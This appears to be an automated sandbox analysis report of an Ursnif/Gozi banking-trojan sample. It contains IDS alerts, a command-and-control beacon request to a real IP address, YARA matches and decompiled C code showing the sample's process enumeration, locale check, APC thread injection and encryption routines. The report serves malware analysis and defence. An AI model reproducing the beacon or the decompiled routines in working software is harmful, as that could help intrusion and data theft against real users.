        RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
        RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
        RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
        RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
        RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
        RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
        RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
        RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
        RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
        RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
        RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
        RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
        RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
        RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
        RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
        RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
        RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
        RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
        RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
        RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
        RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
        RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
        RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
        RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
        RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
        RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
        RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
        RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
        RT_ACCELERATOR0xab4e00x78dataSami LappishFinland
        RT_ACCELERATOR0xab4e00x78dataSami LappishNorway
        RT_ACCELERATOR0xab4e00x78dataSami LappishSweden
        RT_ACCELERATOR0xab4380xa8dataSami LappishFinland
        RT_ACCELERATOR0xab4380xa8dataSami LappishNorway
        RT_ACCELERATOR0xab4380xa8dataSami LappishSweden
        RT_GROUP_CURSOR0xac8680x30data
        RT_GROUP_ICON0xa4ef00x30dataSami LappishFinland
        RT_GROUP_ICON0xa4ef00x30dataSami LappishNorway
        RT_GROUP_ICON0xa4ef00x30dataSami LappishSweden
        RT_GROUP_ICON0xa0fd00x22dataSami LappishFinland
        RT_GROUP_ICON0xa0fd00x22dataSami LappishNorway
        RT_GROUP_ICON0xa0fd00x22dataSami LappishSweden
        RT_GROUP_ICON0xaae380x68dataSami LappishFinland
        RT_GROUP_ICON0xaae380x68dataSami LappishNorway
        RT_GROUP_ICON0xaae380x68dataSami LappishSweden
        RT_VERSION0xac8980x258data
        None0xab5580xadataSami LappishFinland
        None0xab5580xadataSami LappishNorway
        None0xab5580xadataSami LappishSweden
        None0xab5680xadataSami LappishFinland
        None0xab5680xadataSami LappishNorway
        None0xab5680xadataSami LappishSweden
        None0xab5780xadataSami LappishFinland
        None0xab5780xadataSami LappishNorway
        None0xab5780xadataSami LappishSweden
        None0xab5880xadataSami LappishFinland
        None0xab5880xadataSami LappishNorway
        None0xab5880xadataSami LappishSweden

        Imports

        DLLImport
        KERNEL32.dllPulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, _llseek, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, SleepEx, GetWindowsDirectoryA, EnumTimeFormatsW, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GlobalAlloc, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, AddAtomA, FindFirstVolumeMountPointA, GetModuleHandleA, FindNextFileW, GetShortPathNameW, GetCPInfoExA, SetCalendarInfoA, ReadConsoleInputW, DeleteFileW, EnumCalendarInfoExA, LocalFree, CopyFileExA, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, CreateFileW
        USER32.dllLoadMenuA

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        Sami LappishFinland
        Sami LappishNorway
        Sami LappishSweden

        Network Behavior

        Snort IDS Alerts

        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        192.168.2.462.173.142.8149695802033204 03/20/23-11:48:17.902010TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969580192.168.2.462.173.142.81
        192.168.2.462.173.142.8149695802033203 03/20/23-11:48:17.902010TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.462.173.142.81

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Mar 20, 2023 11:48:17.838356972 CET4969580192.168.2.462.173.142.81
        Mar 20, 2023 11:48:17.901516914 CET804969562.173.142.81192.168.2.4
        Mar 20, 2023 11:48:17.901694059 CET4969580192.168.2.462.173.142.81
        Mar 20, 2023 11:48:17.902009964 CET4969580192.168.2.462.173.142.81
        Mar 20, 2023 11:48:17.964943886 CET804969562.173.142.81192.168.2.4
        Mar 20, 2023 11:48:17.966471910 CET804969562.173.142.81192.168.2.4
        Mar 20, 2023 11:48:17.966608047 CET4969580192.168.2.462.173.142.81
        Mar 20, 2023 11:48:17.968391895 CET4969580192.168.2.462.173.142.81
        Mar 20, 2023 11:48:18.031224966 CET804969562.173.142.81192.168.2.4

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Mar 20, 2023 11:46:57.667893887 CET5657253192.168.2.48.8.8.8
        Mar 20, 2023 11:46:57.699767113 CET53565728.8.8.8192.168.2.4

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Mar 20, 2023 11:46:57.667893887 CET192.168.2.48.8.8.80x7302Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Mar 20, 2023 11:46:57.699767113 CET8.8.8.8192.168.2.40x7302Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • 62.173.142.81

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.44969562.173.142.8180C:\Users\user\Desktop\server_(3).exe
        TimestampkBytes transferredDirectionData
        Mar 20, 2023 11:48:17.902009964 CET169OUTGET /drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 62.173.142.81
        Connection: Keep-Alive
        Cache-Control: no-cache


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:11:46:22
        Start date:20/03/2023
        Path:C:\Users\user\Desktop\server_(3).exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\Desktop\server_(3).exe
        Imagebase:0x400000
        File size:181760 bytes
        MD5 hash:AA37B36EA7BA39B6C00AE1B01BADA3F7
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
        Reputation:low

        Disassembly

        Reset < >

          Executed Functions

          Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160threadsleepnativeCOMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 85%
          			E004019F1() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D68();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012E6(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71);
						}
					} while (_v8 != 0);
					_t30 = E00401688(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012E6(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401BA9(_t66);
					goto L20;
				}
			}



























          0x004019f7
          0x004019fc
          0x00401a01
          0x00401ba8
          0x00401ba8
          0x00401a0a
          0x00401a0a
          0x00401a0e
          0x00401a11
          0x00401a12
          0x00401a18
          0x00401a1c
          0x00401a53
          0x00401a1e
          0x00401a26
          0x00401a2c
          0x00401a2e
          0x00401a33
          0x00401a39
          0x00401a3b
          0x00401a3b
          0x00401a42
          0x00401a48
          0x00401a48
          0x00401a4c
          0x00401a4c
          0x00401a5a
          0x00401a61
          0x00401a6a
          0x00401a6d
          0x00401a73
          0x00401a76
          0x00401a7f
          0x00401ba4
          0x00000000
          0x00401ba6
          0x00401a92
          0x00401a95
          0x00401a9d
          0x00401a9f
          0x00401aaa
          0x00401ab2
          0x00401ab2
          0x00401ac0
          0x00401b96
          0x00401b96
          0x00401b9c
          0x00401b9e
          0x00401b9e
          0x00000000
          0x00401ac6
          0x00401ad1
          0x00401b0f
          0x00401b15
          0x00401b27
          0x00401b2d
          0x00401b31
          0x00401b8d
          0x00401b93
          0x00000000
          0x00401b93
          0x00401b3d
          0x00401b4b
          0x00401b53
          0x00401b57
          0x00401b5e
          0x00401b61
          0x00401b63
          0x00401b63
          0x00401b6b
          0x00000000
          0x00401b6d
          0x00401b70
          0x00401b76
          0x00401b7b
          0x00401b82
          0x00401b82
          0x00401b89
          0x00000000
          0x00401b89
          0x00401b6b
          0x00401ad3
          0x00401ad8
          0x00401adf
          0x00401ae1
          0x00401ae5
          0x00401b07
          0x00401b07
          0x00000000
          0x00401b07
          0x00401ae7
          0x00401aec
          0x00401af1
          0x00401af8
          0x00000000
          0x00000000
          0x00401afd
          0x00401b00
          0x00000000
          0x00401b00

          APIs
            • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
            • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
          • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
          • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
          • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
          • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
          • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
          • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
          • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
          • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
          • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
          • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
          • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
          • String ID:
          • API String ID: 3475612337-0
          • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
          • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
          • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
          • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E1508 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163encryptionCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 113 5e1508-5e1548 CryptAcquireContextW 114 5e154e-5e158a memcpy CryptImportKey 113->114 115 5e169f-5e16a5 113->115 116 5e168a-5e1690 114->116 117 5e1590-5e15a2 CryptSetKeyParam 114->117 123 5e16a8-5e16af 115->123 125 5e1693-5e169d CryptReleaseContext 116->125 118 5e15a8-5e15b1 117->118 119 5e1676-5e167c 117->119 121 5e15b9-5e15c6 call 5e33dc 118->121 122 5e15b3-5e15b5 118->122 130 5e167f-5e1688 CryptDestroyKey 119->130 131 5e15cc-5e15d5 121->131 132 5e166d-5e1674 121->132 122->121 126 5e15b7 122->126 125->123 126->121 130->125 133 5e15d8-5e15e0 131->133 132->130 134 5e15e5-5e1602 memcpy 133->134 135 5e15e2 133->135 136 5e161d-5e1629 134->136 137 5e1604-5e161b CryptEncrypt 134->137 135->134 138 5e1632-5e1634 136->138 137->138 139 5e1636-5e1640 138->139 140 5e1644-5e164f 138->140 139->133 141 5e1642 139->141 142 5e1651-5e1661 140->142 144 5e1663-5e166b call 5e61da 140->144 141->142 142->130 144->130
          C-Code - Quality: 50%
          			E005E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x5ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x5ea0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E005E33DC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x5ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x5ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E005E61DA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























          0x005e1511
          0x005e1517
          0x005e151a
          0x005e1520
          0x005e1520
          0x005e1522
          0x005e1524
          0x005e1527
          0x005e152d
          0x005e152e
          0x005e152f
          0x005e1535
          0x005e153a
          0x005e1540
          0x005e1548
          0x005e16a5
          0x005e154e
          0x005e1550
          0x005e1559
          0x005e155e
          0x005e1570
          0x005e1573
          0x005e1577
          0x005e157e
          0x005e1582
          0x005e158a
          0x005e1690
          0x005e1590
          0x005e1590
          0x005e1594
          0x005e1595
          0x005e1597
          0x005e15a2
          0x005e167c
          0x005e15a8
          0x005e15a8
          0x005e15ab
          0x005e15b1
          0x005e15b7
          0x005e15b7
          0x005e15bf
          0x005e15c1
          0x005e15c6
          0x005e166d
          0x005e15cc
          0x005e15d2
          0x005e15d5
          0x005e15d8
          0x005e15da
          0x005e15db
          0x005e15e0
          0x005e15e2
          0x005e15e2
          0x005e15ec
          0x005e15f1
          0x005e15f4
          0x005e15f7
          0x005e15f9
          0x005e1602
          0x005e162c
          0x005e1604
          0x005e1615
          0x005e1615
          0x005e1634
          0x00000000
          0x00000000
          0x005e1636
          0x005e1639
          0x005e163c
          0x005e1640
          0x00000000
          0x005e1642
          0x005e1651
          0x005e1657
          0x005e165f
          0x005e165f
          0x00000000
          0x005e1640
          0x005e1644
          0x005e164a
          0x005e164f
          0x005e1666
          0x00000000
          0x00000000
          0x00000000
          0x005e164f
          0x005e15c6
          0x005e167f
          0x005e1682
          0x005e1682
          0x005e1697
          0x005e1697
          0x005e16af

          APIs
          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,005E5088,00000001,005E3ECE,00000000), ref: 005E1540
          • memcpy.NTDLL(005E5088,005E3ECE,00000010,?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740), ref: 005E1559
          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 005E1582
          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 005E159A
          • memcpy.NTDLL(00000000,775EC740,02BC9600,00000010), ref: 005E15EC
          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02BC9600,00000020,?,?,00000010), ref: 005E1615
          • GetLastError.KERNEL32(?,?,00000010), ref: 005E1644
          • GetLastError.KERNEL32 ref: 005E1676
          • CryptDestroyKey.ADVAPI32(00000000), ref: 005E1682
          • GetLastError.KERNEL32 ref: 005E168A
          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005E1697
